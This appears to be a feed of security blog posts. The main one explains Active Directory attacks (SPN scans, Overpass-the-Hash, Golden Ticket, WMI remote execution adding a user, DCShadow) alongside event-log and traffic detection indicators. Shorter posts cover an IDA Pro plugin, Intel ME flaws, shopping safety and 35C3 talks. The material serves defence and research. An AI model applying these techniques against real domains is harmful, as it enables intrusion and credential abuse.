HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Diagnostic\\15 Field Engineering = 5


Enabling logging of LDAP event 1644
Event 1644 with properties of an LDAP query
Note that there can be multiple events of this kind, and a good alternative to analysis of events is analysis of traffic, because LDAP is a cleartext protocol and all queries are seen clearly in traffic.

LDAP SearchRequest
One more feature of the framework is that it uses only PowerShell and has no dependencies. Moreover, PowerShell v5 has a new option of advanced audit, which is very useful in detection. Event 4104 shows the script body, which can be searched for function names that are specific for PowerView.

SPN Scan

This utility can be a substitute for Nmap. As soon as a hacker knows what users and groups exist in AD, he or she needs information about services to get the whole picture.

Commonly, scanning ports with Nmap provides this information. But now these data can be retrieved from AD—they are already stored there. The query result looks as follows: the reply returns an SPN (Service Principal Name) that consists of a service class, which is unique for each service type, host name in FQDN format, and port for some services.

Examples of SPN for different services
For the full list of SPNs, see https://adsecurity.org/?page_id=183

To detect SPN Scan, audit of LDAP events can be used.

SPN Scan has a clear advantage over Nmap: it is less noisy. When you use Nmap, you need to connect to each host and send packets to the range of ports specified by you, whereas the SPN list is a consequence of only one query.

Remote Sessions Enumeration

During the phase that is called lateral movement, an important task is to match users with computers they are logged on: the attacker either already has the user credentials (hash or a Kerberos ticket) and searches for hosts to log in flawlessly, or searches for the host with a session of the domain administrator.

Both cases trigger the following scenario: hunt –> compromise any host –> upload Mimikatz – > profit.

To detect the use of this scenario, two events can be used: 4624—a successful logon to a remote system (logon type 3), and events of access to the network share IPC$, with one nuance, the named pipe "srvsvc". Why the pipe is named like this can be guessed from the traffic.


Red boxes in the left part show SMB connections, and then connections to the pipe "srvsvc". This pipe allows interacting via the Server Service Remote Protocol. End hosts receive various administrative information from the pipe; for example, one of the requests is NetSessEnum. This request returns a full list of users logged in to the remote system with their IP addresses and names.


MaxPatrol SIEM allows detection based on correlation of these two events with srvsvc taken into account. PT Network Attack Discovery performs similar detection based on traffic analysis.

Overpass-the-Hash

Pass-the-Hash reincarnation. Let's continue with lateral movement. What an attacker can do with NTLM hash on hand? Conduct a Pass-the-Hash attack. But it is already well-known and can be detected. Therefore, a new attack vector—Overpass-the-Hash—has been found.

The Kerberos protocol was developed specifically to prevent sending user passwords over the network in any form. To avoid that, the user encrypts an authentication request using password hash on its own computer. A Key Distribution Center (a special service running on the domain controller) replies with a ticket to get other tickets, the so-called Ticket-Granting Ticket (TGT). Now the client is deemed authenticated and can request tickets to access other services within the next 10 hours. Therefore, if the attacker dumps hash of a user who is a member of a trusted group of the target service (for example, ERP system or database), the attacker can issue a ticket for itself and successfully log in to the target service.



How to detect

If a hacker uses the PowerShell version of Mimikatz for an attack, logging the script body would help, because Invoke-Mimikatz is quite an indicative line.


Another symptom is event 4688—creating a process with extended audit of the command line. Even if a binary file is renamed, the command line would contain the command, which is very peculiar to Mimikatz.


If you want to detect an Overpass-the-Hash attack by analyzing traffic, the following anomaly can be used: Microsoft recommends using AES256 encryption for authentication requests in modern domains, and if Mimikatz sends authentication request data, it encrypts the data with an outdated ARCFOUR.


Another specific feature is the cipher suite sent by Mimikatz, which is different from a legitimate domain's suite, and thus stands out in the traffic.

Golden Ticket

A well-known method.

What can an attacker get out of password hash of a special account called krbtgt? Previously, we reviewed a case where the user could be unprivileged. Now, we review a case where the user's password hash is used for signing absolutely all tickets for gaining other tickets (TGT). There is no need to address to a Key Distribution Center: an attacker can generate this ticket, because a Golden Ticket is in fact a TGT. Then the attacker can send authentication requests on any service in AD for an unlimited period. The result is unrestricted access to target resources—Golden Ticket has its name for a reason.


How to detect based on events 

Event 4768 informs that a TGT was granted, and event 4769 informs that a service ticket required for authentication on some service in AD was granted.


In this case, we can speculate in difference: while Golden Ticket does not request a TGT from the domain controller (because it generates the TGT itself), it has to request a TGS. Therefore, if we see that obtained TGT and TGS differ, we can assume that the Golden Ticket attack is underway.
MaxPatrol SIEM uses table lists to log all issued TGTs and TGSs to implement this method of detection.

WMI Remote Execution

After being authenticated and authorized on target hosts, the hacker can start remote execution of tasks. WMI is a built-in mechanism that fits perfectly for this purpose. For the last few years, living off the land is on trend, which means using built-in Windows mechanisms. The main reason is the ability to mimic legitimate activities.

The figure below demonstrates the use of wmic, a built-in utility. The utility is given a host address for connection, credentials, the process call create operator, and a command to be executed on the remote host.


How to detect 

Check the combination of remote logon events 4624. An important parameter is the Logon ID. Also check event 4688 that informs about creating a process with the command line. Event 4688 shows that the parent of the created process is WmiPrvSE.exe, a special wmi service process used for remote administration. We can see the command net user /add sent by us, and the Logon ID, which is the same as in event 4624. Thus, we can tell absolutely precisely from which host this command was initiated.


Detection based on traffic analysis


We can clearly see words typical of Win32 process create, and the command line, which is going to be executed. The malware on the figure below was distributed on virtual networks in the same way as WannaCry, but instead of encryption, it set up a crypto miner. The malware used Mimikatz and EthernalBlue, dumped accounts, and used them to log in to hosts it could reach on the network. Using WMI, the malware ran PowerShell on these hosts and downloaded PowerShell payload, which also contained Mimikatz, EthernalBlue, and a miner. Thus, a chain reaction was created.


Recommendations

  1. Use complex and long passwords (at least 25 symbols)for service accounts. An attacker would not have any chance to conduct a Kerberoasting attack, because it takes too much time to bruteforce such passwords. 
  2. Enable PowerShell logging. This would help to reveal the use of various modern tools for attacks on AD. 
  3. Upgrade to Windows 10 and Windows Server 2016.  Microsoft created Credential Guard: it prevents dumping of NTLM hashes and Kerberos tickets. 
  4. Implement role-based access control. It is risky to assign permissions of AD, DC, server, and workstation admins to one role. 
  5. Reset the krbtgt (account used for signing TGT) password twice every year and every time the AD administrator changes. It is important to change the password twice, because the current and the previous passwords are stored. Even if a network is compromised and attackers issued a Golden Ticket, changing the password makes this Ticket useless, and they have to bruteforce the password once again. 
  6. Use protection tools with a continuously updating expert database. This helps revealing current ongoing attacks.

DCShadow


On January 24, 2018, Benjamin Delpy and Vincent Le Toux released during the Microsoft BlueHat in Israel a new Mimikatz module that implements the DCShadow attack. The idea of the attack is to create a rogue domain controller to replicate objects in AD. The researchers defined a minimum set of Kerberos SPNs required for successful replication—only two SPNs are required. They also showed a special function that can start forced replication of controllers. The authors assure that this attack can make your SIEM go blind. A rouge domain controller would not send events to SIEM, which means that attackers can do various evil tricks with AD and SIEM, and nobody would know about that.

The attack scheme:


Two SPNs should be added to the system the attack is run from. These SPNs are required for other domain controllers to authenticate using Kerberos for replication. Because the domain controller is represented as the object of class nTDSDSA in the AD base according to the specification, such an object should be created. Finally, replication is triggered by the DRSReplicaAdd function.

How to detect 

This is what DCShadow looks like in traffic. By analyzing the traffic, we can clearly see that a new object is added to the domain controller configuration scheme, and then replication is triggered.


Although the attack creators say that SIEM would not help in its detection, we found a way to inform the security department about suspicious activity on the network.

Our correlation has a list of legitimate domain controllers, and it would be triggered at every replication from a domain controller, which not included into this whitelist. Therefore, the security department can conduct an investigation to check if that is a legitimate domain controller added by the IT service, or a DCShadow attack.

An example of DCShadow confirms that new enterprise attack vectors appear. It is essential to stay on the crest of the wave in this ocean of information security, look ahead, and act quickly.

Every day, we at PT Expert Security Center research new threats and develop methods and tools to detect them. And we'll continue sharing this information with you 

Author: Anton Tyurin, Head of Attack Detection Team, Positive Technologies


Modernizing IDA Pro: how to make processor module glitches go away

$
0
0



Hi there,

This is my latest article on a topic near and dear to my heart: making IDA Pro more modern and, well, better.

Those familiar with IDA Pro probably know that feeling: there are glitches in the processor modules that you use, you don't have the source code, and they are driving you crazy! Unfortunately, not all of the glitches discussed here qualify as bugs, meaning that the developers are unlikely to ever fix them—unless you fix them yourself.

Localizing the glitches

Note: In this article, I will be looking for bugs and issues in the Motorola M68000 module (which happens to be my favorite, as well as a commonly used one).

Glitch #1: Addressing relative to the PC register. Specifically, the disassembler listing for such instructions is not always correct. Check out this screenshot:


Everything seems fine at first glance. And the glitch does not even interfere with analysis. But the opcode has been disassembled incorrectly. Let's look at this in an online disassembler:


We see that our addressing should be relative to the PC register since the target address of the reference is within the signed short range.

Glitch #2: "Mirrors" for RAM and certain other regions. Since addressing on m68k is 24-bit, all access to high (or low) regions should be re-addressed to the same range as the cross-references.

Glitch #3 (which is more like "missing functionality" than an actual glitch): The so-called lineA (1010) and lineF (1111) emulators. These opcodes did not make it into the main command set, so they have to be handled in a special way by interrupt vectors. The size of the opcodes depends only on the implementation in the handler. I've seen only a two-byte implementation. So we'll be adding this.

Glitch #4: Trap #N instruction" does not give any cref to the trap handlers.

Glitch #5: The movea.w instruction should make a full xref to an address from a word reference, but we get only a word integer.

Fixing the glitches (empty template)


To understand how to fix a particular processor module, you have to know what our abilities are in this regard, and what exactly a "fix" means.

In short: a fix is delivered in the form of a plug-in, which can be written in either Python or C++ (I chose the latter). C++ is less portable but if anyone is willing to take up the task of porting the plug-in to Python, I will be only grateful!

First we create an empty DLL project in Visual Studio: File->New->Project->Windows Desktop Wizard->Dynamic link library (.dll). Select the Empty Project checkbox and clear all the other checkboxes:


We unpack the IDA SDK and indicate it in the Visual Studio macros (here I am using the 2017 version), which makes it easy to refer to in the future. We simultaneously will add a macro for the path to IDA Pro.

Go to View->Other Windows->Property Manager:


Since we are working with SDK version 7.0, compilation will be performed with the x64 compiler. So select Debug | x64->Microsoft.Cpp.x64.user->Properties:


In the User Macros section, click Add Macro. There we will indicate IDA_SDK alongside the path of where we unpacked the SDK:


Now we can do the same with IDA_DIR (the path being for your copy of IDA Pro):


(By default, IDA is installed in %Program Files%, which requires administrator rights.)

Let's also get rid of the Win32 configuration (this article does not cover compilation for x86 systems) and leave just x64.

Create the empty file ida_plugin.cpp, which for the moment contains no code. Now we can select the character set and other settings for C++:




Now add some includes:



And SDK libraries:



Now we drop in the code template:



Fixing the bugs (filling out the template)


The print_op() and print_insn() functions are needed so we can see which flags have been set by the current processor module for certain instructions. This is necessary for finding flags for available opcodes so we can use them in our fix.

The body of our "fixer" is the hook_idp() function. For our needs, we will need to implement three callbacks in it:

  1. processor_t::ev_ana_insn: this is needed if the processor module does not implement some opcodes
  2. processor_t::ev_emu_insn: here you can make cross-references to data/code to which new opcodes refer (or old ones do not refer)
  3. processor_t::ev_out_mnem: new opcodes need to get output somehow—so that's what goes on here

The init_plugin() function will stop our fixer from launching on other processor modules.
And most importantly, we hook the whole callback to processor module events:

hook_to_notification_point(HT_IDP, hook_idp, NULL);

The trick with the ana_addr global variable is necessary so that ana_insn does not get stuck in recursion when trying to get information about an instruction that we do not parse manually. This crutch has been around for a long time since early versions, and alas, doesn't seem to be going away anytime soon.

Fix for Glitch #1


Finding a solution required a lot of mucking about with the debugger output that I implemented for the purpose. I knew that in some cases, IDA successfully outputs references relative to PC (for instructions where a jump is made based on an offset table that is near the current instruction plus register index); but proper display of addressing had not been implemented for the lea instruction. Ultimately, I found one such instruction with a jump and figured out which flags are needed to make PC display properly with parentheses:

caseprocessor_t::ev_ana_insn: { insn_t *out = va_arg(va, insn_t*); if (ana_addr) break; ana_addr = 1; if (ph.ana_insn(out) <= 0) { ana_addr = 0; break; } ana_addr = 0; for (int i = 0; i < UA_MAXOP; ++i) { op_t&op = out->ops[i]; switch (op.type) { case o_near: case o_mem: { if (out->itype != 0x76 || op.n != 0 || (op.phrase != 0x09&& op.phrase != 0x0A) || (op.addr == 0 || op.addr >= (1<< 23)) || op.specflag1 != 2) // lea table(pc),Axbreak; short diff = op.addr - out->ea; if (diff >= SHRT_MIN && diff <= SHRT_MAX) { out->Op1.type = o_displ; out->Op1.offb = 2; out->Op1.dtype = dt_dword; out->Op1.phrase = 0x5B; out->Op1.specflag1 = 0x10; } } break; } } return out->size; } break;

Fix for Glitch #2


Here things are simple. We simply mask addresses for a specific range: 0xFF0000-0xFFFFFF (for RAM) and 0xC00000–0xC000FF (for VDP video memory). The main thing is to filter by operand type with o_near and o_mem.

caseprocessor_t::ev_ana_insn: { insn_t *out = va_arg(va, insn_t*); if (ana_addr) break; ana_addr = 1; if (ph.ana_insn(out) <= 0) { ana_addr = 0; break; } ana_addr = 0; for (int i = 0; i < UA_MAXOP; ++i) { op_t&op = out->ops[i]; switch (op.type) { case o_near: case o_mem: { op.addr &= 0xFFFFFF; // for any mirrorsif ((op.addr & 0xE00000) == 0xE00000) // RAM mirrors op.addr |= 0x1F0000; if ((op.addr >= 0xC00000&& op.addr <= 0xC0001F) || (op.addr >= 0xC00020&& op.addr <= 0xC0003F)) // VDP mirrors op.addr &= 0xC000FF; } break; } } return out->size; } break;

Fix for Glitch #3


To add the opcodes, what we need to do is:

1.Define indexes for the new opcodes. All new indexes should start with: CUSTOM_INSN_ITYPE

enumm68k_insn_type_t{ M68K_linea = CUSTOM_INSN_ITYPE, M68K_linef, };

2.The lineA/lineF opcodes trigger when the following bytes are encountered in the code: 0xA0/0xF0. So we read one byte.

3.Get reference to the handling vector. The interrupt vectors are located in the first 64 dwords of the header, in my case. The lineA/lineF handlers are at positions 0x0A and 0x0B:

value = get_dword(0x0A * sizeof(uint32)); // ...value = get_dword(0x0B * sizeof(uint32));

4.In ev_emu_insn we add cross-references for handlers and the following instruction to avoid interrupting the code flow:

insn->add_cref(insn->Op1.addr, 0, fl_CN); // code ref insn->add_cref(insn->ea + insn->size, insn->Op1.offb, fl_F); // flow ref

5.In ev_out_mnem we output our custom opcode:

constchar *mnem = (outbuffer->insn.itype == M68K_linef) ? "line_f" : "line_a"; outbuffer->out_custom_mnem(mnem);


enumm68k_insn_type_t{ M68K_linea = CUSTOM_INSN_ITYPE, M68K_linef, }; /* after includes */caseprocessor_t::ev_ana_insn: { insn_t *out = va_arg(va, insn_t*); if (ana_addr) break; uint16 itype = 0; ea_t value = out->ea; uchar b = get_byte(out->ea); if (b == 0xA0 || b == 0xF0) { switch (b) { case0xA0: itype = M68K_linea; value = get_dword(0x0A * sizeof(uint32)); break; case0xF0: itype = M68K_linef; value = get_dword(0x0B * sizeof(uint32)); break; } out->itype = itype; out->size = 2; out->Op1.type = o_near; out->Op1.offb = 1; out->Op1.dtype = dt_dword; out->Op1.addr = value; out->Op1.phrase = 0x0A; out->Op1.specflag1 = 2; out->Op2.type = o_imm; out->Op2.offb = 1; out->Op2.dtype = dt_byte; out->Op2.value = get_byte(out->ea + 1); } return out->size; } break; caseprocessor_t::ev_emu_insn: { constinsn_t *insn = va_arg(va, constinsn_t*); if (insn->itype == M68K_linea || insn->itype == M68K_linef) { insn->add_cref(insn->Op1.addr, 0, fl_CN); insn->add_cref(insn->ea + insn->size, insn->Op1.offb, fl_F); return1; } } break; caseprocessor_t::ev_out_mnem: { outctx_t *outbuffer = va_arg(va, outctx_t *); if (outbuffer->insn.itype != M68K_linea && outbuffer->insn.itype != M68K_linef) break; constchar *mnem = (outbuffer->insn.itype == M68K_linef) ? "line_f" : "line_a"; outbuffer->out_custom_mnem(mnem); return1; } break;

Fix for Glitch #4

Find the opcode for the trap instruction, get the index from the instruction, and take the handler vector at that index. The result resembles the following:



caseprocessor_t::ev_emu_insn: { constinsn_t *insn = va_arg(va, constinsn_t*); if (insn->itype == 0xB6) // trap #X { qstring name; ea_t trap_addr = get_dword((0x20 + (insn->Op1.value & 0xF)) * sizeof(uint32)); get_func_name(&name, trap_addr); set_cmt(insn->ea, name.c_str(), false); insn->add_cref(trap_addr, insn->Op1.offb, fl_CN); return1; } } break;

Fix for Glitch #5


Things are clear-cut here too: first filter by the movea.w operation. Then, if the operand is of the word type and refers to RAM, we make a snazzy reference relative to the base 0xFF0000. Here's how this looks:



caseprocessor_t::ev_ana_insn: { insn_t *out = va_arg(va, insn_t*); if (ana_addr) break; ana_addr = 1; if (ph.ana_insn(out) <= 0) { ana_addr = 0; break; } ana_addr = 0; for (int i = 0; i < UA_MAXOP; ++i) { op_t&op = out->ops[i]; switch (op.type) { case o_imm: { if (out->itype != 0x7F || op.n != 0) // moveabreak; if (op.value & 0xFF0000&& op.dtype == dt_word) { op.value &= 0xFFFF; } } break; } } return out->size; } break; caseprocessor_t::ev_emu_insn: { constinsn_t *insn = va_arg(va, constinsn_t*); for (int i = 0; i < UA_MAXOP; ++i) { constop_t&op = insn->ops[i]; switch (op.type) { case o_imm: { if (insn->itype != 0x7F || op.n != 0 || op.dtype != dt_word) // moveabreak; op_offset(insn->ea, op.n, REF_OFF32, BADADDR, 0xFF0000); } break; } } } break;

Conclusions


Making fixes to modules can be rather involved, especially when it's something more complicated than simply implementing unknown opcodes.

This can mean hours of debugging the current implementation and trying to figure out how it all works (perhaps with some reversing of the module itself). But the results are well worth it.

Link to code: https://github.com/lab313ru/m68k_fixer

Author: Vladimir Kononovich, Positive Technologies


What We Have Learned About Intel ME Security In Recent Years: 7 Facts About The Mysterious Subsystem

$
0
0
Image: Unsplash
Intel ME has captured the attention of researchers during the last years. There is an air of mystery about the technology. Although it has access to virtually all the data on the computer, and hackers can get total control over the machine if they manage to compromise Intel ME, there are no official documents or guides regarding its use. That is why researchers from all over the world have to deal with the technology on their own.

We have studied Intel ME over the last years, and here is what we have found about this mysterious subsystem so far.

Vulnerabilities in ME allow compromising even a turned-off computer


At the end of 2017, Positive Technologies experts Mark Ermolov and Maxim Goryachy spoke at Black Hat Europe about a vulnerability in Intel Management Engine 11, which allows intruders to access most of the data and processes on a device. You will find a detailed description of the problem in our article.

The vulnerability in Intel ME allowed executing arbitrary code. This threatens many technologies, including Intel Protected Audio Video Path (PAVP), Intel Platform Trust Technology (PTT or fTPM), Intel Boot Guard, and Intel Software Guard Extensions (SGX).

To intercept data in ME, JTAG debugging mechanism can be used 


By exploiting the bug in the bup module, the experts managed to turn on the PCH red unlock mechanism, which opens full access to all PCH devices in order to use them via DFx chain—in other words, using JTAG. ME kernel is precisely one of such devices. The experts could then debug the code executed on ME, read memory of all the processes and the kernel, and also manage all the devices inside the PCH. They found out that there are about 50 internal devices in modern computers to which only ME has full access, while the main processor has access only to a very limited subset of them.

Full access also means that any intruder exploiting this vulnerability can bypass the traditional software protection and conduct attacks even when the computer is turned off.

JTAG can be activated in the mobile version of ME


Intel TXE is the mobile version of ME. Vulnerability INTEL-SA-00086 allows activating JTAG for the subsystem kernel. Positive Technologies experts developed JTAG PoC for the Gigabyte Brix GP-BPCE-3350C platform. This utility can be used to activate JTAG for Intel TXE.

The subsystem can be disabled in undocumented mode


Positive Technologies experts Maxim Goryachy and Mark Ermolov delved deep into the internal architecture of Intel Management Engine (ME) 11, revealing a mechanism that can disable Intel ME after hardware is initialized and the main processor starts. Although it is impossible to entirely disable ME on modern computers, hackers can still compromise devices in an undocumented mode called High Assurance Platform (HAP). The experts discovered a special HAP bit, which after being installed allows disabling Intel ME at an early stage of booting.

The name High Assurance Platform belongs to a trusted platform program linked to the U.S. National Security Agency (NSA). Presentation with program description is available online. This mechanism was presumably introduced by the U.S. government agencies striving to reduce the likelihood of side-channel data leaks.

ME security flaws threatening MacBook


This June, Apple released updates that eliminated the CVE-2018-4251 vulnerability. The vulnerability was in the Manufacturing Mode component—a service mode for configuring, setting, and testing an end platform at the production stage. This mode allows setting critical platform parameters that are stored in the one-time programmable memory (FUSES). The mode must be disabled before the device is put on sale and purchased by a user.

Neither the mode nor its potential risks are described in Intel public documentation. An ordinary user cannot disable the mode, as the relevant management utility is not officially available.

The vulnerability allows an attacker with administrator rights to gain unauthorized access to critical parts of firmware, write a vulnerable version of Intel ME, and exploit it to secretly gain a foothold in the device. Next, it is possible to obtain full control over the computer and spy with no chance of being detected.

Vulnerable Intel chipsets are used all over the world, from home and work laptops to enterprise servers. The update previously released by Intel does not prevent exploitation of vulnerabilities CVE-2017-5705, CVE-2017-5706, and CVE-2017-5707, because with write access to ME region, an attacker can write a vulnerable version of МЕ and exploit a vulnerability in it.

Intel patches the same bugs in ME twice


In early July, Intel issued two security advisories (SA-00112 and SA-00118) regarding fixes for firmware vulnerabilities in Intel Management Engine. Both advisories describe vulnerabilities with which an attacker could execute arbitrary code on the Minute IA PCH microcontroller.

The vulnerabilities are similar to ones previously discovered by Positive Technologies security experts in November 2017 (SA-00086). But that was not the end of the story, as Intel later released new fixes for ME vulnerabilities.

CVE-2018-3627, the vulnerability at issue in advisory SA-00118, is described as a logic bug (not a buffer overflow) that may allow execution of arbitrary code. An attacker needs local access to exploit this vulnerability, whereas the vulnerability described in advisory SA-00086 is locally exploitable only in case of OEM configuration errors. This makes this vulnerability more dangerous.

Things are even worse with CVE-2018-3628, which is described in advisory SA-00112. This vulnerability enables remote code execution in the AMT process of the Management Engine firmware. Moreover, all signs indicate that—unlike CVE-2017-5712 in advisory SA-00086—attackers do not need an AMT administrator account.

Intel characterizes the vulnerability as "Buffer overflow in HTTP handler," which suggests the possibility of remote code execution without authorization. This is precisely the nightmare for all Intel users.

How to disclose Intel ME encryption keys


However, this was not the end of Intel ME adventures. In autumn, the company had to fix another bug in the subsystem, which led to the disclosure of Intel ME encryption keys. The vulnerability was detected by Positive Technologies experts Dmitry Sklyarov and Maxim Goryachy.

Intel ME (Management Engine) stores data with the help of MFS (which likely stands for "ME File System"). MFS security mechanisms make heavy use of cryptographic keys. Confidentiality keys are used to keep the MFS data secret, while Integrity keys allow controlling the integrity. MFS data are divided into two categories according to sensitivity. They are protected by different key sets. The most sensitive data are protected by Intel Keys, with Non-Intel Keys being used for everything else. Thus, four keys are used—that is, Intel Integrity Key, Non-Intel Integrity Key, Intel Confidentiality Key, and Non-Intel Confidentiality Key.

By exploiting the vulnerability discovered by Mark Ermolov and Maxim Goryachy, attackers can obtain all the four keys and fully compromise MFS protection mechanisms. Intel later issued an update eliminating this vulnerability. By increasing the SVN (Security Version Number), Intel updated all keys to make MFS security work as intended. It should now have been impossible to obtain the MFS keys for updated ME firmware versions (those with the new SVN value).

But in 2018, Positive Technologies experts discovered vulnerability CVE-2018-3655, described in advisory Intel-SA-00125. They found that Non-Intel Keys are derived from two values: the SVN and the immutable non-Intel root secret, which is unique to each platform. By using the earlier vulnerability to enable the JTAG debugger, it is possible to obtain the second value. Knowing the immutable root secret enables calculating the values of both Non-Intel Keys even in the newer firmware version.

Attackers can calculate the Non-Intel Integrity Key and Non-Intel Confidentiality Key for firmware that has the updated SVN value, and therefore compromise the MFS security mechanisms that rely on these keys.

What now?


We recently published a detailed description of the CVE-2018-4251 vulnerability in MacBook. Mark Ermolov and Maxim Goryachy will speak at HiTB conference on how attackers can exploit the vulnerability. They will alsol discuss protection mechanisms, such as a special utility developed by our experts.

How to Protect Yourself When Shopping Online

$
0
0
Image credit: Pexels
Online shopping safety is a pressing issue for both consumers and business users, especially in the holiday season. As customers flock to online stores to cross off their Christmas wish-lists, cyber criminals look to take advantage of the high traffic and customers looking for the best deal.

Always remember, the Internet is not a governed, safe environment. It’s the wild west. There really are no guarantees to security when shopping online and even big companies can be affected by security vulnerabilities. This blog covers some of the greatest security risks this Christmas season, and gives practical tips to help you shop safely online this year.

Phishing Scams

During promotional periods, such as Black Friday or Cyber Monday, you’re more likely to fall victim to phishing scams – attacks sent directly to people via email to steal your payment or personal information. Attackers send out phishing emails posing as large retailers with attractive discounts and – for many consumers – this is enticing enough to make a poor decision and click on a malicious link. This link may provide your personal and payment data directly to the bad guys, or infect your device with malware.

Even large companies can be susceptible to these attacks. In our own research, Positive Technologies found that 88 percent of employees open unknown files and links they receive by email. Earlier this year, Saks Fifth Avenue was a victim of one such crime, and five million credit and debit card numbers were stolen from their systems.

Phishing campaigns are designed to play to your emotions. Emails will attempt to convince you that they’re from a trusted source, and it can be hard to discern if an email is genuine or not.

Here are a few tips for spotting and avoiding phishing scams:

  1. Be wary of unwanted emails or emails from an unknown source. If a shop you don’t usually receive emails from is contacting you for the first time, it could be a fake.
  2. Look for misspellings in the email. Criminals don’t have a marketing department and a sloppy email might indicate a cheap scam.
  3. Is the email addressed to you by name? Criminals are unlikely to know your full name, so they may address you by Sir or Madam.
  4. Do not click on unknown links contained within emails. It may sound like a great deal, but in fact it could cost you dearly.
  5. Remember that the sender’s email address is not a guarantee that the email came from the person or organization that the message claims to be. If something seems fishy, check with the sender directly.

Compromised E-Commerce Websites

Criminals don’t just target customers directly, they also target the retailers they use. If a website it compromised and you input your credit card details, you may be handing your banking information directly to cyber criminals and could see fraud on your account later on.

Of course, this isn’t your fault. However, customers should be vigilant and aware of this risk. On some websites, you may see visual indications of “security,” such as padlock icons which show that a website is using SSL, or Secure Sockets Layer – a protocol that encrypts information sent between a web browser, like Google Chrome, and a web server, such as those operated by the retail company you’re shopping from. However, this is no guarantee that your information is secure. We saw companies like Newegg, Ticketmaster and British Airways affected by malware over the summer that stole credit card data entered onto the websites – and they used SSL.

Customers, therefore have to take their own steps to protecting themselves online.

Here are our top tips to protecting yourself from compromised websites:

  1. Try free tools that help you distinguish risky websites from safe ones. For example, Web of Trust.
  2. Remember, even “safe” websites can be attacked so also consider using free malware blocking tools. NoScript, for example, is a free browser extension that will block the malicious code from loading during your checkout session.
  3. Use virtual cards for online shopping. These typically have a short lifetime and allow you set specific limits per transaction. This means if you are compromised, a cyber criminal can’t access your entire bank account. Some banks and credit providers, such as Bank of America (ShopSafe), Capital One (ENO) and Citi offer these but there are other dedicated providers, such as Entropay.
  4. If you have to pay online using your debit or credit card, choose your credit card. You are typically entitled to better protection over purchases so are more likely to be covered if you are a victim of fraud.
  5. Monitor your bank account thoroughly to spot fraudulent activity early on. Enable SMS notifications for your account so that you receive visual confirmation for the purchases you make. If your bank account allows you to set transaction limits, enable this feature as well. And of course, if you notice any suspicious transactions, inform your bank immediately and block the card.

Author: Leigh-Anne Galloway, cybersecurity resilience lead at Positive Technologies

Remarkable talks from 35C3

$
0
0
The 35th Chaos Communication Congress was held at the end of December 2018 in Leipzig, Germany. I have attended a lot of interesting lectures. In this article I'll share the list of great technical talks which I liked the most.

1. Hanno Böck gave a great presentation on the history of SSL and TLS up to the new TLS 1.3, including attacks on the implementations of these protocols and the countermeasures taken. I was especially interested in the difficulties with moving the entire Internet over to the new protocol versions.

[Link to the schedule]



2. Thomas Roth, Josh Datko, and Dmitry Nedospasov jointly researched the security of hardware crypto wallets. They took a look at the security of the supply chain, firmware, and — the most interesting — device hardware. For example, they used a special antenna to remotely recognize the signal between the device display and CPU. They also successfully performed a glitching attack against the hardware crypto wallet and extracted the seed. Impressive work!

[Link to the schedule]



3. Hardware security was also covered by Trammell Hudson, in the context of the Supermicro implant story. He tried to give an objective overview of the controversy but reached some contradictory conclusions. Trammell tried to show that it was possible for the hardware backdoor described in the notorious Bloomberg article to exist. He even gave a demo in which he launched some BMC firmware in qemu and ran arbitrary commands as root by image-spoofing on the qemu side. But some experts have serious doubts about his arguments.

[Link to the schedule]



4. Researchers from Ruhr University delved into the structure of AMD CPU microcode. Their talk provides deep technical details on the topic. This is a continuation of last year's talk from the same team. What I really liked is that the researchers made a custom microcode for a hardware Address Sanitizer that works without the memory access instrumentation. Unfortunately, this approach was tried out only on a toy operating system, so it's unclear how much faster it is comparing to KASAN in the Linux kernel.

[Link to the schedule]



5. Saar Amar's talk was a superb overview of bypassing the userspace anti-exploitation protections in Windows 7 and 10. Live demos were great! This talk would be also interesting for researchers specializing on security of other operating systems, since the described techniques are generic.

[Link to the schedule]



6. Claudio Agosti told about a browser plug-in that monitors how Facebook personalizes and filters the content depending on user properties. This tool made its debut during the Italian elections, producing some very interesting statistics. The goal of the project is not to reverse-engineer Facebook's algorithms, but to get a better understanding of how any given public event is covered on social media.

[Link to the schedule]



7. The researchers from Graz University of Technology gave an entertaining overview of Meltdown and Spectre vulnerabilities. They presented a complex classification covering all public variants of these vulnerabilities. The researchers also disclosed some new Meltdown variants. Surprisingly, this information is not under embargo now and OS developers are not currently working on the mitigations. Maybe the industry is waiting for a real PoC exploit to appear?

[Link to the schedule]



8. Joscha Bach gave a very neat and sophisticated talk on the similarities and differences between the human mind and AI. Expect a heady mix of philosophy, math, neurophysics, and offbeat humor.

[Link to the schedule]



9. An 18-year-old guy from Israel described how he found an RCE vulnerability in the ChakraCore engine of Microsoft Edge browser. His discovery involves a classic example of type confusion, when a floating-point number turns into a pointer and is dereferenced.

[Link to the schedule]



10. I really liked Carlo Meijer's talk about breaking SSD self-encryption (which is trusted by BitLocker, incidentally). The presentation included discussion of the threat model (which is always nice), hacking of Self-Encrypting Drives (SEDs) from several manufacturers (all with demos), and the conclusion that SSD self-encryption in all cases is less secure than the full disk encryption performed by OS. Definitely worth watching.

[Link to the schedule]



11. Hacking the PlayStation Viva was a blast: the researchers even managed to extract the platform's most important key from its security-hardened ROM. Watching this talk was a treat, thanks to top-notch research and great presentation of the material.

[Link to the schedule]



12. Curious about blocking of Telegram in Russia? I was dreading that I would have to hear political propaganda, but instead was delighted by a lively technical talk. The researcher gave a history of the steps taken by the Roskomnadzor, showed statistics, explained some of the technical gaps, and gave a good-natured trolling to the authorities.

[Link to the schedule]



13. An inspiring talk on the software and hardware inside the Curiosity rover, which went to Mars. Beautiful slides and smooth presentation – I recommend it.

[Link to the schedule]



14. Everyone is in deep trouble, at least judging by this talk about the vulnerabilities in Broadcom's Bluetooth firmware. Updating or fixing it is not feasible for a number of reasons. Moreover, affected devices include nearly all smartphones made in the last five years, cars, and the IoT. Maybe we all just need to turn off Bluetooth?

[Link to the schedule]



These talks are just a starter list — I highly recommend checking the 35C3 recordings!

Enjoy!

Author: Alexander Popov, Positive Technologies

The Cost Of Security And Privacy For Telcos: How To Do The Math

$
0
0
Image credit: Pexels

Join Positive Technologies’ telecoms expert Michael Downs for a thought-provoking webinar on the processes and best practices all operators should be following to ensure their networks are secure. In this informative webinar, participants will get an understanding of:

  • the critical security incidents facing telcos every day globally and how operators can remain vigilant in order to support revenue growth
  • how to get transparent TCO (total cost of ownership) estimates for security and significant return on investment while staying in budget
  • the steps required to guarantee compliance with an ever-growing list of requirements in the mobile sector, including 5G and Internet of Things (IoT)

